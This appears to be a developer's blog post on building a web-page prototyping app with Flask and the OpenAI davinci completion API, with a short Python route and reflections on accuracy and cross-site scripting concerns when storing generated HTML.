I modified the code to work with my site, but the basic structure of the code is from what was generated by OpenAI. I was not familiar with Flask. I’m a professional web developer, though. The ChatGPT, the Finxter tutorial, and my experience helped me get up to speed with Flask in minutes.  

The code for the application can be found on Replit and Github. I’ll post links to the Replit because I believe it gives you the best ability to run and fork the code. 

The communication of the API is the Python code here (Replit):

def gpt3_request(): data = request.get_json() prompt = data['prompt'] completions = openai.Completion.create( engine="text-davinci-002", prompt=prompt, max_tokens=4000, n=1, stop=None, temperature=0.5, ) message = completions.choices[0].text print(message) return jsonify({'message': message})

It’s called by the JavaScript code here, which parses the HTML. You can see the code below. 

It does this to organize the code into CSS, HTML, and JavaScript. It’ll later be injected back into the DOM of a new page. I did this step because the JavaScript and CSS were not always well-formed, so I wanted to separate them out.

I used Chat GPT and StackOverflow. I used StackOverflow to find a technique to help me determine which one to use. I used Stackoverflow to determine what JavaScript technique I should use to save it in the database.

I like StackOverflow because there is a human voting mechanism. It also has feedback and different perspectives and opposing sides.  This is something that ChatGPT misses. It’s only one source

Here’s the prompt I used on ChatGPT to show me the JavaScript client-side database code

 I knew I had to save it for the client. Here’s some of the code to save to the client

You can see the full code here: https://replit.com/@kevron/Web-Prototyper#static/post.js

It is about 75% of the same code as what I got from Chat-GPT-3 . 

The technologies used are Replit for the IDE, OpenAI DaVinci, Python and flask for the backend, HTML and javascript, GIT for source control, and Chat-GPT3.

Understanding the Security, Safety Concerns, and Limitations

This a powerful technology, and I think there are both security and safety concerns that I learned about from using GPT 3 and reading articles about it.

The security concern in this app is that I can now generate tons of HTML pages if I want to. What if some of the information on this site is unsafe or inaccurate? The potential for the inaccuracy of the data is mentioned on many sites. This technology needs to be used safely from OpenAI.

Since this is a new powerful and new technology, many other new safety concerns may arise. I think it’ll vary depending on the organizations’ specific use of GPT.

They lack the ability to generalize and see the big picture. 

Also, the data is stored in the browser’s database. It should not be modified and open to store the HTML code from the website. It could be an internal company tool, though. It’s ok when it is run on the client, but saving this in the database could be dangerous and open up cross-site scripting concerns.

For example, it could be saved in GitHub or saved in someone else’s database.

My Conclusions

This technology is super exciting and will empower many people to create things from just an idea.

Bill Gates and other large investors have said this technology is transformative. Companies such as Google and Microsoft are investing millions of dollars in it. 

Despite the safety concerns of GPT and some of its limitations, I’m very excited about working with this technology and other assistive AI technology in the future.

It helped me immensely in writing this code.

I’m also optimistic that some of its criticisms of accuracy are being worked on and addressed.

I learned through writing this article how powerful and helpful GPT can be as an assistive tool. I also learned firsthand that while GPT is powerful, it does not seem like it will replace a human programmer. It cannot generalize, see the big picture, and fact-check like a human does from multiple sources.

So I hope that in following this article, you’ve developed knowledge about GPT and learned how to use it as a code generation tool too.